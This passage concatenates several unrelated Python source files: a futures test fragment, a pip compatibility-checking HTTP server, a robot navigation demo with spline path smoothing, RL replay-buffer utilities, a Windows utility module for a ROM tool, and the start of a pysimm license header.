        f.set_exception(e)

        with self.assertRaisesRegex(
                futures.InvalidStateError,
                'FINISHED: <Future at 0x[0-9a-f]+ '
                'state=finished raised ValueError>'
        ):
            f.set_exception(Exception())

        self.assertEqual(f.exception(), e)
def setUpModule():
    # Clean up multiprocessing test state once the whole module has run.
    unittest.addModuleCleanup(multiprocessing.util._cleanup_tests)
    # Snapshot live threads now so leaked threads can be detected and
    # reaped at module teardown.
    thread_info = threading_helper.threading_setup()
    unittest.addModuleCleanup(threading_helper.threading_cleanup, *thread_info)
if __name__ == "__main__":
    unittest.main()  # Discover and run every test in this module.
|
compatibility_checker_server.py | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A HTTP server that wraps pip_checker.
Requires Python 3.6 or later.
Example usage:
$ python3 compatibility_checker_server.py \
--host=0.0.0.0 --port=8888 \
    --python-versions 2:python2,3:python3
$ curl 'http://0.0.0.0:8888/?package=six&python-version=3' \
| python3 -m json.tool
{
"result": "SUCCESS",
"packages": [
"six"
],
"description": null,
"requirements": "absl-py==0.2.2\napparmor==2.11.1\n..."
}
For complete usage information:
$ python3 compatibility_checker_server.py --help
"""
import argparse
import collections.abc
import json
import logging
import pprint
import threading
import typing
import urllib.parse
import wsgiref.simple_server
import pip_checker
def _parse_python_version_to_interpreter_mapping(s):
version_to_interpreter = {}
for version_mapping in s.split(','):
try:
version, command = version_mapping.split(':')
except ValueError:
raise argparse.ArgumentTypeError(
('{0} is not in the format of <version>:<command>,' +
'<version>:<command>').format(s))
version_to_interpreter[version] = command
return version_to_interpreter
class CompatibilityServer:
    """WSGI HTTP server that exposes pip_checker compatibility checks."""

    def __init__(self, host: str, port: int, clean: bool,
                 python_version_to_interpreter: typing.Mapping[str, str],
                 install_once: bool):
        """Initialize an HTTP server that checks for pip package compatibility.

        Args:
            host: The host name to listen on e.g. "localhost".
            port: The port number to listen on e.g. 80.
            clean: If True then uninstall previously installed packages before
                handling each request.
            python_version_to_interpreter: Maps python version e.g. "3" to
                a Python interpreter that corresponds to that version e.g.
                "/usr/bin/python3.6"
            install_once: If True then the server will exit after handling a
                single request that involves installing pip packages.
        """
        self._host = host
        self._port = port
        self._clean = clean
        self._python_version_to_interpreter = python_version_to_interpreter
        self._install_once = install_once

    def _shutdown(self):
        # serve_forever() blocks this thread, so shutdown() must run from a
        # separate thread to avoid deadlocking on the current request.
        threading.Thread(target=self._httpd.shutdown).start()

    def _check(self, start_response, python_version, packages):
        """Run pip_checker for *packages* and build the WSGI response body."""
        if not packages:
            start_response('400 Bad Request',
                           [('Content-Type', 'text/plain; charset=utf-8')])
            return [b'Request must specify at least one package']

        if not python_version:
            start_response('400 Bad Request',
                           [('Content-Type', 'text/plain; charset=utf-8')])
            return [b'Request must specify the Python version to use']

        if python_version not in self._python_version_to_interpreter:
            start_response('400 Bad Request',
                           [('Content-Type', 'text/plain; charset=utf-8')])
            return [
                b'Invalid Python version specified. Must be one of: %s' % (
                    ', '.join(
                        self._python_version_to_interpreter).encode('utf-8'))
            ]

        python_command = self._python_version_to_interpreter[python_version]

        # Schedule shutdown before the (possibly long) check so only this
        # one install-handling request is served.
        if self._install_once:
            self._shutdown()
        try:
            pip_result = pip_checker.check(
                [python_command, '-m', 'pip'], packages, clean=self._clean)
        except pip_checker.PipError as pip_error:
            start_response('500 Internal Server Error',
                           [('Content-Type', 'text/plain; charset=utf-8')])
            with open(pip_error.stderr_path, 'r') as f:
                error_text = f.read()
            logging.error('pip command ("%s") failed with:\n%s\n',
                          pip_error.command_string, error_text)
            return [
                b'pip command ("%s") ' % pip_error.command_string.encode(
                    'utf-8'),
                b'failed with:\n',
                error_text.encode('utf-8'), b'\n'
            ]
        results = dict(
            result=pip_result.result_type.name,
            packages=pip_result.packages,
            description=pip_result.result_text,
            dependency_info=pip_result.dependency_info)
        start_response('200 OK', [('Content-Type', 'application/json')])
        return [json.dumps(results).encode('utf-8')]

    def _wsgi_app(self, environ, start_response):
        """WSGI entry point: extract parameters from GET/POST and run _check."""
        if environ.get('REQUEST_METHOD') == 'GET':
            parameters = urllib.parse.parse_qs(environ.get('QUERY_STRING', ''))
            packages = parameters.get('package', [])
            python_version = parameters.get('python-version', [None])[0]
        elif environ.get('REQUEST_METHOD') == 'POST':
            content_length = int(environ.get('CONTENT_LENGTH', 0))
            try:
                request = json.loads(
                    environ['wsgi.input'].read(content_length))
            except json.JSONDecodeError as e:
                start_response('400 Bad Request',
                               [('Content-Type', 'text/plain; charset=utf-8')])
                return [b'Invalid JSON payload: ', str(e).encode('utf-8')]
            if not isinstance(request, collections.abc.Mapping):
                start_response('400 Bad Request',
                               [('Content-Type', 'text/plain; charset=utf-8')])
                return [b'Request must contain a JSON object.']
            packages = request.get('packages', [])
            python_version = request.get('python-version', None)
        else:
            start_response('405 Method Not Allowed',
                           [('Content-Type', 'text/plain; charset=utf-8'),
                            ('Allow', 'GET, POST')])
            return [
                b'Method %s not supported' %
                environ.get('REQUEST_METHOD').encode('utf-8')
            ]
        return self._check(start_response, python_version,
                           packages)

    def serve(self):
        """Block forever serving requests (until _shutdown() is triggered)."""
        with wsgiref.simple_server.make_server(self._host, self._port,
                                               self._wsgi_app) as self._httpd:
            self._httpd.serve_forever()
def main():
    """Parse command-line flags and run the compatibility-check HTTP server."""
    logging.basicConfig(
        level=logging.INFO,
        format='%(levelname)-8s %(asctime)s ' +
        '%(filename)s:%(lineno)s] %(message)s')

    # Bug fix: the description previously read "Process some integers." — a
    # leftover from the argparse tutorial example.
    parser = argparse.ArgumentParser(
        description='HTTP server that checks pip package compatibility.')
    parser.add_argument(
        '--host',
        default='0.0.0.0',
        help='host name to which the server should bind')
    parser.add_argument(
        '--port',
        type=int,
        default=8888,
        help='port to which the server should bind')
    parser.add_argument(
        '--clean',
        action='store_true',
        help='uninstall existing packages before performing dependency ' +
        'checking')
    parser.add_argument(
        '--install-once',
        action='store_true',
        help='exit after doing a single "pip install" command')
    parser.add_argument(
        '--python-versions',
        type=_parse_python_version_to_interpreter_mapping,
        default='2:python2,3:python3',
        help='maps version strings to the Python command to execute when ' +
        'running that version e.g. "2:python2;2,3:python3;' +
        '3.5:/usr/bin/python3.5;3.6:/usr/bin/python3.6"')
    args = parser.parse_args()

    logging.info('Running server with:\n%s', pprint.pformat(vars(args)))

    CompatibilityServer(args.host, args.port, args.clean, args.python_versions,
                        args.install_once).serve()
if __name__ == '__main__':
    main()  # Start the compatibility-check HTTP server.
|
env_test.py | from gibson2.envs.locomotor_env import NavigateRandomEnv, HotspotTravEnv
from time import time, sleep
import numpy as np
import gibson2
import os
from gibson2.core.render.profiler import Profiler
import logging
import math
import cv2 as cv
import threading
from gibson2.utils.utils import quatToXYZW, quatFromXYZW
from transforms3d.euler import euler2quat, quat2euler, euler2axangle, axangle2euler
from transforms3d.quaternions import quat2mat, axangle2quat
import io
import json
from scipy.interpolate import splev, splprep, Rbf, InterpolatedUnivariateSpline, CubicSpline, interp1d
from CatmullRomSpline import CatmullRomChain, RecursiveCatmullRomChain
from geomdl import BSpline, fitting
logging.getLogger().setLevel(logging.DEBUG)  # Raise logging verbosity to DEBUG
def smooth_filter(p_x, p_y):
    """Smooth two coordinate sequences with a centered moving average.

    The first and last ``size`` samples are copied through unchanged; every
    interior sample becomes the mean of the 2*size + 1 surrounding samples.
    Returns the smoothed coordinates as a pair of numpy arrays.
    """
    size = 2  # half-width of the averaging window
    window = size * 2 + 1
    x, y = [], []
    # Leading points pass through untouched.
    for i in range(size):
        x.append(p_x[i])
        y.append(p_y[i])
    # Centered moving average over the interior.
    for i in range(size, len(p_x) - size):
        x.append(sum(p_x[i - size:i + size + 1]) / window)
        y.append(sum(p_y[i - size:i + size + 1]) / window)
    # Trailing points pass through untouched (negative indices).
    for i in range(size):
        x.append(p_x[i - size])
        y.append(p_y[i - size])
    return np.array(x), np.array(y)
def main():
    """Drive the robot along smoothed shortest paths for 20 random episodes."""
    global recording
    global nav_env
    config_filename = os.path.join(os.path.dirname(gibson2.__file__),
                                   '../examples/configs/turtlebot_demo.yaml')
    nav_env = HotspotTravEnv(config_file=config_filename, mode='gui')
    for j in range(20):
        nav_env.reset()
        # Full list of shortest-path way-points plus the path length.
        path, dist = nav_env.get_shortest_path(entire_path=True)
        print(dist)
        p_x = path[:, 0]
        p_y = path[:, 1]
        p_t = np.arange(len(p_x))
        # First smoothing pass: Catmull-Rom spline through the way-points.
        c = CatmullRomChain(path)
        s_x, s_y = zip(*c)
        # --- Alternative interpolation experiments, kept for reference ---
        # tck_x, u_x = splprep([p_t, p_x], k=5)
        # tck_y, u_y = splprep([p_t, p_y], k=5)
        # u = np.linspace(0, 1, 100)
        # _, s_x = np.array(splev(u, tck_x))
        # _, s_y = np.array(splev(u, tck_y))
        # rbf_x = Rbf(p_t, p_x)
        # rbf_y = Rbf(p_t, p_y)
        # u = np.linspace(0, len(p_t), 99)
        # s_x = rbf_x(u)
        # s_y = rbf_y(u)
        # ius_x = InterpolatedUnivariateSpline(p_t, p_x)
        # ius_y = InterpolatedUnivariateSpline(p_t, p_y)
        # u = np.linspace(0, len(p_t), 99)
        # s_x = ius_x(u)
        # s_y = ius_y(u)
        f_x = interp1d(p_t, p_x)
        f_y = interp1d(p_t, p_y)
        _u = np.linspace(0, p_t[-1], len(p_t) * 1)
        # _p_x, _p_y = smooth_filter(f_x(_u), f_y(_u))
        # Second pass: moving-average filter, then cubic-spline resampling
        # at ~30 samples per meter of path length.
        _p_x, _p_y = smooth_filter(np.array(s_x), np.array(s_y))
        _p_t = np.arange(len(_p_x))
        cs_x = CubicSpline(_p_t, _p_x)
        cs_y = CubicSpline(_p_t, _p_y)
        u = np.linspace(0, _p_t[-1], int(dist * 30))
        s_x = cs_x(u)
        s_y = cs_y(u)
        # crv = fitting.interpolate_curve(path.tolist(), 5)
        # u = np.linspace(0, 1, 100)
        # pts = np.array(crv.evaluate_list(u))
        # s_x = pts[:, 0]
        # s_y = pts[:, 1]
        nav_env.step_visualization(np.array([[s_x[p], s_y[p]] for p in range(len(s_x))]))
        recording = True
        # threading.Thread(target=recorder_core, args=(os.path.join(os.path.dirname(gibson2.__file__), '../examples/captures', 'bs'+str(j) + '.avi'),)).start()
        # save_path(str(j) + '.json', path.tolist())
        # Step the robot through every resampled point, re-orienting toward
        # the next position each step.
        for i in range(len(s_x)):
            # with Profiler('Environment action step'):
            pos = nav_env.get_position_of_interest()
            next_pos = [s_x[i], s_y[i], pos[2]]
            next_dir = np.array([next_pos[0] - pos[0], next_pos[1] - pos[1]])
            # print(next_pos)
            orn = nav_env.get_orientation()
            next_orn = new_orientation_from_dir(orn, next_dir)
            state, reward, done, info = nav_env.step((next_pos, next_orn))
            # sleep(1)
            if i == len(s_x) - 1:
                logging.info("Episode finished after {} timesteps".format(i + 1))
                break
        recording = False
def save_path(filePath, data):
    """Write *data* to *filePath* as a JSON document."""
    with open(filePath, 'w') as f:
        f.write(json.dumps(data))
def normalize(vec):
    """Return *vec* scaled to unit Euclidean length."""
    length = np.linalg.norm(vec)
    return vec / length
def new_orientation_from_dir(orn, next_dir):
    """Return an XYZW quaternion yawing the +x axis onto *next_dir*.

    NOTE(review): the *orn* parameter is currently unused — the heading is
    computed from *next_dir* alone; kept for interface compatibility.
    """
    forward = np.array([1, 0])
    unit_dir = normalize(next_dir)
    cos_a = np.dot(forward, unit_dir)
    sin_a = np.cross(forward, unit_dir)
    # Recover the signed yaw angle from its cosine and the cross-product sign.
    angle = np.arccos(cos_a)
    if sin_a < 0:
        angle = -angle
    # print(rad)
    return quatToXYZW(axangle2quat(np.array([0, 0, 1]), angle, is_normalized=True), 'wxyz')
def get_frame():
    # Convert the viewer's float frame buffer to a uint8 image by scaling
    # by 255 (assumes values in [0, 1] — TODO confirm against the renderer).
    # Relies on the module-global `nav_env` set in main().
    return (nav_env.simulator.viewer.frame * 255).astype(np.uint8)
def get_clipped(frame):
    """Return the top 256 rows of *frame*.

    Bug fix: the previous implementation ignored its *frame* argument and
    re-grabbed a fresh frame via get_frame(), so callers could never clip an
    already-captured frame.
    """
    return frame[:256, :]
def recorder_core(filename):
    """Record viewer frames to *filename* until the global `recording` flag clears."""
    res = (512, 512)
    fps = 20.0
    # DIVX(.avi) / XVID
    writer = cv.VideoWriter(filename, cv.VideoWriter_fourcc(*'DIVX'), fps, res)
    while recording:
        writer.write(get_frame())
        sleep(1 / fps)
    writer.release()
if __name__ == "__main__":
    main()  # Run the 20-episode smoothed-path demo.
|
utils.py | import torch
import numpy as np
import torch.nn as nn
import gym
import os
from collections import deque
import random
import copy
import skimage
import torch.multiprocessing as mp
class eval_mode(object):
    """Context manager that switches models to eval mode and restores the
    previous training flags on exit."""

    def __init__(self, *models):
        self.models = models

    def __enter__(self):
        # Record each model's training flag just before disabling it.
        self.prev_states = []
        for model in self.models:
            self.prev_states.append(model.training)
            model.train(False)

    def __exit__(self, *args):
        # Restore the saved flags; never suppress exceptions.
        for model, was_training in zip(self.models, self.prev_states):
            model.train(was_training)
        return False
def soft_update_params(net, target_net, tau):
    """Polyak-average net into target_net: theta' <- tau*theta + (1-tau)*theta'."""
    for src, dst in zip(net.parameters(), target_net.parameters()):
        dst.data.copy_(tau * src.data + (1 - tau) * dst.data)
def set_seed_everywhere(seed):
    """Seed every RNG in use (stdlib, numpy, torch CPU/CUDA) for reproducibility."""
    random.seed(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    if torch.cuda.is_available():
        torch.cuda.manual_seed_all(seed)
def module_hash(module):
    """Cheap fingerprint of a module: sum of all state_dict tensor elements."""
    return sum(tensor.sum().item() for tensor in module.state_dict().values())
def make_dir(dir_path):
    """Best-effort creation of *dir_path*; always returns the path.

    OSError (e.g. the directory already exists) is deliberately ignored.
    """
    try:
        os.mkdir(dir_path)
    except OSError:
        pass
    return dir_path
def preprocess_obs(obs, bits=5):
    """Quantize *obs* to 2**bits levels, add uniform dequantization noise and
    center to [-0.5, 0.5). See https://arxiv.org/abs/1807.03039."""
    assert obs.dtype == torch.float32
    levels = 2 ** bits
    if bits < 8:
        # Drop the low-order bits of the (0-255 scaled) input.
        obs = torch.floor(obs / 2 ** (8 - bits))
    obs = obs / levels + torch.rand_like(obs) / levels - 0.5
    return obs
def random_augment(obses, rad_height, rad_width):
    """Randomly crop each (n, c, h, w) image by 2*rad_height / 2*rad_width pixels."""
    n, c, h, w = obses.shape
    out_h = h - 2 * rad_height
    out_w = w - 2 * rad_width
    # Per-image random offsets (width drawn first, matching RNG call order).
    left = torch.randint(0, rad_width + 1, (n,))
    top = torch.randint(0, rad_height + 1, (n,))
    cropped = torch.empty((n, c, out_h, out_w), device=obses.device).float()
    for i, (obs, x0, y0) in enumerate(zip(obses, left, top)):
        cropped[i][:] = obs[:, y0:y0 + out_h, x0:x0 + out_w]
    return cropped
def evaluate(env, agent, num_episodes, L, step, args):
    """Run *num_episodes* evaluation rollouts and log episode rewards to *L*."""
    for episode in range(num_episodes):
        obs = env.reset()
        #video.init(enabled=(episode == 0))
        done = False
        episode_reward = 0
        while not done:
            with eval_mode(agent):
                # Center-crop the observation to the agent's input size.
                crop = slice(args.rad_offset, args.image_size + args.rad_offset)
                obs = obs[:, crop, crop]
                action = agent.select_action(obs)
            obs, reward, done, _ = env.step(action)
            #video.record(env)
            episode_reward += reward

        #video.save('%d.mp4' % step)
        L.log('eval/episode_reward', episode_reward, step)
    L.dump(step)
class BufferQueue(object):
    """Transfers fixed-arity tuples between processes via parallel queues.

    Item *i* of every put() goes into queue *i*, so heterogeneous payloads
    keep their positional association.
    """

    def __init__(self, num_items, max_size=10, start_method='spawn'):
        self.max_size = max_size
        context = mp.get_context(start_method)
        self.queues = [context.Queue(max_size) for _ in range(num_items)]

    def put(self, *items):
        # One item per queue, in positional order; blocks when a queue is full.
        for queue, item in zip(self.queues, items):
            queue.put(item)

    def get(self):
        # Blocks until every queue yields one item; preserves positional order.
        return [queue.get() for queue in self.queues]
class RadReplayBuffer(object):
    """Buffer to store environment transitions.

    Stores pixel observations (uint8), proprioceptive states (float32), or
    both, plus actions/rewards/done flags in pre-allocated ring buffers.
    sample() applies RAD-style random cropping to pixel observations.
    """

    def __init__(self, obs_shape, state_shape, action_shape, capacity, batch_size, rad_offset, device):
        self.capacity = capacity
        self.batch_size = batch_size
        self.device = device

        # the proprioceptive obs is stored as float32, pixels obs as uint8
        #obs_dtype = np.float32 if len(obs_shape) == 1 else np.uint8

        # A trailing dimension of 0 marks the modality as unused.
        self.ignore_obs = True
        self.ignore_state = True
        if obs_shape[-1] != 0:
            self.obses = np.empty((capacity, *obs_shape), dtype=np.uint8)
            self.next_obses = np.empty((capacity, *obs_shape), dtype=np.uint8)
            self.ignore_obs = False
            # Crop margins are a fraction (rad_offset) of image height/width.
            self.rad_h = round(rad_offset * obs_shape[1])
            self.rad_w = round(rad_offset * obs_shape[2])
        if state_shape[-1] != 0:
            self.states = np.empty((capacity, *state_shape), dtype=np.float32)
            self.next_states = np.empty((capacity, *state_shape), dtype=np.float32)
            self.ignore_state = False
        self.actions = np.empty((capacity, *action_shape), dtype=np.float32)
        self.rewards = np.empty((capacity, 1), dtype=np.float32)
        self.not_dones = np.empty((capacity, 1), dtype=np.float32)

        self.idx = 0          # next write position in the ring buffer
        self.last_save = 0
        self.full = False     # True once the buffer has wrapped around

    def add(self, obs, state, action, reward, next_obs, next_state, done):
        # Write one transition at idx, then advance the ring pointer.
        if not self.ignore_obs:
            self.obses[self.idx] = obs
            self.next_obses[self.idx] = next_obs
        if not self.ignore_state:
            self.states[self.idx] = state
            self.next_states[self.idx] = next_state
        self.actions[self.idx] = action
        self.rewards[self.idx] = reward
        self.not_dones[self.idx] = not done

        self.idx = (self.idx + 1) % self.capacity
        self.full = self.full or self.idx == 0

    def sample(self):
        # Uniform sample over the valid region (whole buffer once full).
        idxs = np.random.randint(
            0, self.capacity if self.full else self.idx, size=self.batch_size
        )
        if self.ignore_obs:
            obses = None
            next_obses = None
        else:
            obses = torch.as_tensor(self.obses[idxs], device=self.device).float()
            next_obses = torch.as_tensor(self.next_obses[idxs], device=self.device).float()
            # RAD data augmentation: independent random crops per sample.
            obses = random_augment(obses, self.rad_h, self.rad_w)
            next_obses = random_augment(next_obses, self.rad_h, self.rad_w)
        if self.ignore_state:
            states = None
            next_states = None
        else:
            states = torch.as_tensor(self.states[idxs], device=self.device).float()
            next_states = torch.as_tensor(self.next_states[idxs], device=self.device).float()
        actions = torch.as_tensor(self.actions[idxs], device=self.device)
        rewards = torch.as_tensor(self.rewards[idxs], device=self.device)
        not_dones = torch.as_tensor(self.not_dones[idxs], device=self.device)

        return obses, states, actions, rewards, next_obses, next_states, not_dones
import time
import threading
import cv2 as cv
class AsyncRadReplayBuffer(RadReplayBuffer):
    """Replay buffer fed asynchronously by an environment queue and drained by a learner queue.

    Two background threads are started on construction:
      - recv_from_env: pulls transitions from input_queue into the buffer.
      - send_to_update: pushes sampled batches onto output_queue, throttled so
        that at most max_update_freq batches are sent per environment step
        (after init_step warm-up steps).

    Fixes vs. original: the worker threads are daemonized (they run endless
    loops, so non-daemon threads kept the process alive forever on shutdown),
    and the `chucks` typo in load() is corrected.
    """
    def __init__(self, obs_shape, state_shape, action_shape, capacity, batch_size, rad_offset,
                 device, input_queue, output_queue, init_step, max_update_freq, sync_queue):
        super(AsyncRadReplayBuffer, self).__init__(obs_shape, state_shape, action_shape, capacity, batch_size,
                                                   rad_offset, device)
        self.init_step = init_step
        self._step = 0
        self._send_counter = 0
        self._max_update_freq = max_update_freq
        self.input_queue = input_queue
        self.output_queue = output_queue
        self.sync_queue = sync_queue
        self.start_thread()

    def start_thread(self):
        # Daemon threads: these loops never return, so they must not block exit.
        threading.Thread(target=self.recv_from_env, daemon=True).start()
        threading.Thread(target=self.send_to_update, daemon=True).start()

    def recv_from_env(self):
        """Continuously append transitions arriving from the environment process."""
        while True:
            self.add(*self.input_queue.get())
            self._step += 1

    def send_to_update(self):
        """Continuously sample batches for the learner, rate-limited by _max_update_freq."""
        while True:
            if self._send_counter > (self._step - self.init_step) * self._max_update_freq:
                time.sleep(0.1)  # learner is ahead of the environment; back off
            else:
                if self.sync_queue is not None:
                    self.sync_queue.get()  # block until the learner requests a batch
                self.output_queue.put(tuple(self.sample()))
                self._send_counter += 1

    def save(self, save_dir):
        """Persist transitions accumulated since the last save as a torch payload."""
        if self.idx == self.last_save:
            return
        path = os.path.join(save_dir, '%d_%d.pt' % (self.last_save, self.idx))
        payload = [
            self.obses[self.last_save:self.idx],
            self.states[self.last_save:self.idx],
            self.next_obses[self.last_save:self.idx],
            self.next_states[self.last_save:self.idx],
            self.actions[self.last_save:self.idx],
            self.rewards[self.last_save:self.idx],
            self.not_dones[self.last_save:self.idx]
        ]
        self.last_save = self.idx
        torch.save(payload, path)

    def load(self, save_dir):
        """Restore transitions from chunk files written by save(), in index order."""
        chunks = sorted(os.listdir(save_dir), key=lambda x: int(x.split('_')[0]))
        for chunk in chunks:
            start, end = [int(x) for x in chunk.split('.')[0].split('_')]
            path = os.path.join(save_dir, chunk)
            payload = torch.load(path)
            assert self.idx == start
            self.obses[start:end] = payload[0]
            self.states[start:end] = payload[1]
            self.next_obses[start:end] = payload[2]
            self.next_states[start:end] = payload[3]
            self.actions[start:end] = payload[4]
            self.rewards[start:end] = payload[5]
            self.not_dones[start:end] = payload[6]
            self.idx = end
class FrameStack(gym.Wrapper):
    """Gym wrapper that stacks the last k observations along the first (channel) axis."""
    def __init__(self, env, k):
        gym.Wrapper.__init__(self, env)
        self._k = k
        self._frames = deque([], maxlen=k)
        shp = env.observation_space.shape
        # The stacked observation space grows k-fold along the first dimension.
        self.observation_space = gym.spaces.Box(
            low=0,
            high=1,
            shape=((shp[0] * k,) + shp[1:]),
            dtype=env.observation_space.dtype
        )
        self._max_episode_steps = env._max_episode_steps

    def reset(self):
        """Reset the env and prime the stack with k copies of the first observation."""
        first = self.env.reset()
        for _ in range(self._k):
            self._frames.append(first)
        return self._get_obs()

    def step(self, action):
        """Step the env, push the new frame, and return the refreshed stack."""
        frame, reward, done, info = self.env.step(action)
        self._frames.append(frame)
        return self._get_obs(), reward, done, info

    def _get_obs(self):
        assert len(self._frames) == self._k
        return np.concatenate(list(self._frames), axis=0)
|
utils.py | import os
import sys
import time
import struct
import zipfile
import threading
import subprocess
import requests
from requests import exceptions
# Import win32api
import win32api
import win32gui, win32con
'''
Supported helpers:
    chLocal()
        change the working directory to the directory containing the current script
        (no arguments)
    str2hex(string)
        convert a string to its hex representation
    symlink(target, file)
        create a symlink file that cygwin can recognize
        (first argument is the link target, second is the file to create)
    mkdir(path)
        create a directory at the given path
    rmdir(path)
        recursively delete the directory at the given path
    hideDosConsole(title)
        hide a console window identified by its title
    showDosConsole(title)
        show a console window identified by its title
    hideForegroundWindow()
        hide the current foreground window
    addExecPath(addpath)
        prepend a directory to the PATH environment variable
    get_time()
        return the current time
    listfile(path, ext)
        path: directory to search; ext: file extension to match
    runcmd(cmd)
        run a system command (non-ASCII output is not supported)
    getShiju()
        fetch a poem line from an online API
'''
def chLocal():
    """Change the working directory to the directory containing the running script."""
    script_dir = os.path.dirname(sys.argv[0])
    os.chdir(os.path.abspath(script_dir))
def str2hex(string):
    """Return the hex representation of the UTF-8 encoding of *string*."""
    return bytes(string, 'UTF-8').hex()
def hexStringTobytes(str):
    """Decode a hex string (spaces allowed between digits) into bytes."""
    # Note: parameter name kept for call compatibility even though it shadows builtin str.
    return bytes.fromhex(str.replace(" ", ""))
def bytesToHexString(bs):
    """Encode a bytes-like object as an uppercase hex string."""
    return ''.join(format(b, '02X') for b in bs)
def symlink(target, file):
    """Create a file that cygwin recognizes as a symlink to *target*.

    Layout: the magic b'!<symlink>' marker, a UTF-16LE BOM, the target encoded
    one ASCII byte followed by a NUL byte each (i.e. UTF-16LE), then a
    two-byte terminator. The SYSTEM attribute is required for cygwin to treat
    the file as a link.

    Fix: the file handle is now closed via a context manager (the original
    leaked it if encoding the target raised).
    """
    with open(file, "wb") as f:
        f.write(b'!<symlink>')
        f.write(b'\xff\xfe')  # UTF-16LE byte order mark
        # Raises UnicodeEncodeError for non-ASCII targets, like the original.
        for byte in target.encode("ascii"):
            f.write(bytes((byte, 0)))
        f.write(b'\x00\x00')  # UTF-16 NUL terminator
    win32api.SetFileAttributes(file, win32con.FILE_ATTRIBUTE_SYSTEM)  # mark as SYSTEM
def mkdir(path):
    """Create *path* (including parents); return False if it already exists."""
    if os.path.exists(path):
        return False
    os.makedirs(path)
def hideDosConsole(title):
    """Hide the console window whose title matches *title*."""
    hwnd = win32gui.FindWindow('ConsoleWindowClass', title)
    win32gui.ShowWindow(hwnd, win32con.SW_HIDE)  # hide the window
def showDosConsole(title):
    """Show the console window whose title matches *title*."""
    hwnd = win32gui.FindWindow('ConsoleWindowClass', title)
    win32gui.ShowWindow(hwnd, win32con.SW_SHOW)  # show the window
def hideForegroundWindow():
    """Hide whichever window currently has the foreground."""
    win32gui.ShowWindow(win32gui.GetForegroundWindow(), win32con.SW_HIDE)
def addExecPath(addpath):
    """Prepend the absolute form of *addpath* to the PATH environment variable.

    Fix: uses os.environ instead of os.putenv. os.putenv does not update
    os.environ, so the original's subsequent os.getenv('PATH') calls never saw
    earlier additions and repeated calls silently dropped them. Assigning to
    os.environ updates both this process's view and the environment inherited
    by child processes.
    """
    execpath = os.path.abspath(addpath)
    os.environ['PATH'] = execpath + ";" + os.environ.get('PATH', '')
def get_time():
    """Return the current wall-clock time as 'HH:MM:SS'.

    Fix: the original compared the fresh strftime value against an
    always-empty local variable, so the branch was dead code; a single
    strftime call is equivalent.
    """
    return time.strftime('%H:%M:%S')
def thrun(fun):
    """Run *fun* on a daemon thread so long-running work cannot block the UI or exit.

    Fix: Thread.setDaemon() is deprecated (since Python 3.10); the daemon flag
    is now passed to the constructor.
    """
    worker = threading.Thread(target=fun, daemon=True)
    worker.start()
def listfile(path, ext):
    """Recursively collect paths of files under *path* whose extension equals *ext* (e.g. '.txt')."""
    matches = []
    for root, _dirs, files in os.walk(path):
        matches.extend(
            os.path.join(root, name)
            for name in files
            if os.path.splitext(name)[1] == ext
        )
    return matches
def listDirHeader(path, head):
    """Return the entries of directory *path* whose names start with *head*."""
    return [entry for entry in os.listdir(path) if entry.startswith(head)]
def unzip_file(zip_src, dst_dir):
    """Extract every member of archive *zip_src* into directory *dst_dir*.

    Prints a notice and does nothing if *zip_src* is not a zip file.

    Fix: the ZipFile handle is now closed deterministically via a context
    manager (the original leaked it), and extractall replaces the manual
    per-member loop.
    """
    if zipfile.is_zipfile(zip_src):
        with zipfile.ZipFile(zip_src, 'r') as archive:
            archive.extractall(dst_dir)
    else:
        print('This is not zip')
def zip_file(file, dst_dir):
    """Create zip archive *file* containing everything under directory *dst_dir*.

    Member names inside the archive are relative to *dst_dir* (the function
    temporarily chdirs into it so os.walk('.') yields relative paths).

    Fixes: the working directory is restored even if archiving fails (the
    original left the process chdir'd into *dst_dir* on error), and the local
    variable no longer shadows the builtin `zip`.
    """
    archive_path = os.path.abspath(file)
    original_cwd = os.getcwd()
    os.chdir(dst_dir)
    try:
        # Walk relative to '.', so stored member names are relative paths.
        file_paths = []
        for root, _dirs, files in os.walk('.'):
            for filename in files:
                file_paths.append(os.path.join(root, filename))
        with zipfile.ZipFile(archive_path, 'w', compression=zipfile.ZIP_DEFLATED,
                             allowZip64=True) as archive:
            for member in file_paths:
                archive.write(member)
    finally:
        os.chdir(original_cwd)
def test():
    """Smoke-test helper: print a fixed marker string."""
    print("test")
def getShiju():
    """Fetch a random poem entry from the jinrishici API, bypassing any system proxy."""
    no_proxy = {"http": None,
                "https": None}
    response = requests.get("https://v1.jinrishici.com/all", proxies=no_proxy)
    return response.json()
def getOnlineVersion():
    """Download the latest published version string from the project repository mirror."""
    no_proxy = {"http": None,
                "https": None}
    url = "https://ghproxy.com/https://raw.githubusercontent.com/affggh/NH4RomTool/master/version.txt"
    return requests.get(url, proxies=no_proxy).text
def getCurrentVersion():
    """Read the locally installed version string from version.txt in the working directory.

    Fix: the file handle is now closed deterministically via a context manager.
    """
    with open("version.txt", "r") as f:
        return f.read()
def getdirsize(dir):
    """Return the total size in bytes of all files under *dir*, recursively."""
    total = 0
    for root, _dirs, files in os.walk(dir):
        for name in files:
            total += os.path.getsize(os.path.join(root, name))
    return total
print("Load utils...")  # import-time notice that this helper module was loaded
lmps.py | # ******************************************************************************
# pysimm.lmps module
# ******************************************************************************
#
# ******************************************************************************
# License
# ******************************************************************************
# The MIT License (MIT)
#
# Copyright (c) 2016 Michael E. Fortunato, Coray M. Colina
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
